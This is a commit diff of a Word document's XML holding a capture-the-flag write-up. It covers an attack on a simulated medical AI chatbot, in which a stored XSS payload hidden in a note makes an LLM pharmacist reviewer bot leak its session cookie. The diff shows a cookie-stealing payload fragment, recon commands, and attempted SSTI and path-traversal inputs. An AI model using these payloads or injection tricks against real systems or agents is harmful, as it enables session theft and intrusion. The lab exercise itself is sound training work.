<commit_message>
Uploaded token city writeup
</commit_message>
<xml_diff>
--- a/documentation/docs/Protocol_Drift_Report.docx
+++ b/documentation/docs/Protocol_Drift_Report.docx
@@ -30,6 +30,28 @@
           <w:szCs w:val="30"/>
         </w:rPr>
         <w:t>Comprehensive Security Report</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="444444"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="444444"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Written By: Kelly Cheng</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -81,12 +103,6 @@
         <w:gridCol w:w="7160"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -144,12 +160,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -206,12 +216,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -268,12 +272,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -325,12 +323,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -411,7 +403,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> AI Odyssey Capture The Flag competition. The target is EPOCH-1 </w:t>
+        <w:t xml:space="preserve"> AI Odyssey Capture </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Flag competition. The target is EPOCH-1 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -419,7 +419,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>, a simulated shipboard medical AI chatbot running on port 5000. The challenge category is Agentic AI and the vulnerability class is LLM05 — Insecure Output Handling, specifically a Stored Cross-Site Scripting attack routed through a server-side pharmacist bot reviewer.</w:t>
+        <w:t xml:space="preserve">, a simulated shipboard medical AI chatbot running on port 5000. The challenge category is Agentic </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>AI</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and the vulnerability class is LLM05 — Insecure Output Handling, specifically a Stored Cross-Site Scripting attack routed through a server-side pharmacist bot reviewer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -563,6 +571,7 @@
         <w:t>='+</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -573,6 +582,7 @@
         <w:t>document.cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -621,12 +631,6 @@
         <w:gridCol w:w="7160"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -678,12 +682,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -735,12 +733,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -808,12 +800,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -865,12 +851,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -894,6 +874,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Target IP</w:t>
             </w:r>
           </w:p>
@@ -922,12 +903,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2200" w:type="dxa"/>
@@ -951,7 +926,6 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Flag</w:t>
             </w:r>
           </w:p>
@@ -974,7 +948,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>THM{XXXXXXX_XXX_XXXXX_XXXX}  (retrieved from /</w:t>
+              <w:t>THM{XXXXXXX_XXX_XXXXX_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>XXXX}  (</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t>retrieved from /</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
@@ -1112,83 +1094,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>// so the player's own browser doesn't actually fire the payload — only the bot does.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A successful attack requires filing a note containing two trigger keywords that route it to the senior pharmacist, along with a hidden XSS payload that fires when the bot renders its review response as HTML. The exfiltrated session cookie then appears in the attacker’s /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>my_callbacks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> log.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>8.2 Reconnaissance and Initial Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Step 1: Port Scanning</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>RustScan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> was run against the target. The first hint on the challenge Discord confirmed this was the intended starting point.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="20" w:after="20"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1196,9 +1104,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>rustscan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>so</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1206,67 +1114,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -a 10.144.144.167</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Result: Two open ports confirmed — 22 (SSH) and 5000 (HTTP). SSH was immediately ruled out as a primary attack vector. Hydra confirmed SSH requires public key authentication only, with no password auth enabled.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Step 2: Web Application Enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> was run against the root and /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> paths to discover hidden endpoints.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="20" w:after="20"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> the player's own browser doesn't </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1274,9 +1124,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>actually fire</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1284,8 +1134,90 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
+        <w:t xml:space="preserve"> the payload — only the bot does.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A successful attack requires filing a note containing two trigger keywords that route it to the senior pharmacist, along with a hidden XSS payload that fires when the bot renders its review response as HTML. The exfiltrated session cookie then appears in the attacker’s /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>api</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>my_callbacks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> log.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>8.2 Reconnaissance and Initial Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Step 1: Port Scanning</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RustScan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>was run</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> against the target. The first hint on the challenge Discord confirmed this was the intended starting point.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="20" w:after="20"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -1294,7 +1226,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>dir</w:t>
+        <w:t>rustscan</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1304,7 +1236,125 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -u http://10.144.144.167:5000/api -w /</w:t>
+        <w:t xml:space="preserve"> -a 10.144.144.167</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Result: Two open ports confirmed — 22 (SSH) and 5000 (HTTP). SSH was immediately ruled out as a primary attack vector. Hydra confirmed SSH requires public key authentication only, with no password auth enabled.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Step 2: Web Application Enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> was run against the root and /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>api</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> paths to discover hidden endpoints.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="20" w:after="20"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-u</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http://10.144.144.167:5000/api -w /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1399,6 +1449,7 @@
         <w:spacing w:before="40" w:after="40"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>GET /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1465,7 +1516,6 @@
         <w:spacing w:before="40" w:after="40"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>POST /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1534,7 +1584,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> protection. This was later confirmed as a false positive via manual inspection in Firefox DevTools. This false positive caused significant wasted effort.</w:t>
+        <w:t xml:space="preserve"> protection. This was later confirmed as a false positive via manual inspection in Firefox DevTools. This false positive caused significant </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>wasted</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> effort.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1593,6 +1651,7 @@
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1603,6 +1662,7 @@
         <w:t>active.innerHTML</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1620,9 +1680,9 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>payload.data</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>payload.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1630,7 +1690,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>;   // Switch to HTML rendering for the final reply.</w:t>
+        <w:t>data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">;   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>// Switch to HTML rendering for the final reply.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1643,7 +1723,15 @@
         <w:spacing w:before="60" w:after="60"/>
       </w:pPr>
       <w:r>
-        <w:t>The status grid in the page sidebar also disclosed four critical system states: FILTER: ACTIVE, RENDER: HTML, REVIEW: ~30s, SESSION: COOKIE. This confirmed HTML rendering is intentional and that the pharmacist reviews notes within 30 seconds.</w:t>
+        <w:t xml:space="preserve">The status grid in the page sidebar also disclosed four critical system states: FILTER: ACTIVE, RENDER: HTML, REVIEW: ~30s, SESSION: COOKIE. This confirmed HTML rendering is intentional and that the pharmacist reviews </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>notes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> within 30 seconds.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1857,12 +1945,6 @@
         <w:gridCol w:w="3577"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:tblHeader/>
         </w:trPr>
@@ -1958,12 +2040,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2095,12 +2171,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2193,12 +2263,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2314,12 +2378,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2417,12 +2475,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2506,12 +2558,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2595,12 +2641,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2651,7 +2691,23 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>Server-Side Template Injection ({{7*7}})</w:t>
+              <w:t xml:space="preserve">Server-Side Template </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Injection ({{</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>7*7}})</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2684,12 +2740,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2805,12 +2855,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2894,12 +2938,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -2983,12 +3021,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="400" w:type="dxa"/>
@@ -3039,7 +3071,23 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>Path traversal (/static/../</w:t>
+              <w:t>Path traversal (/static</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
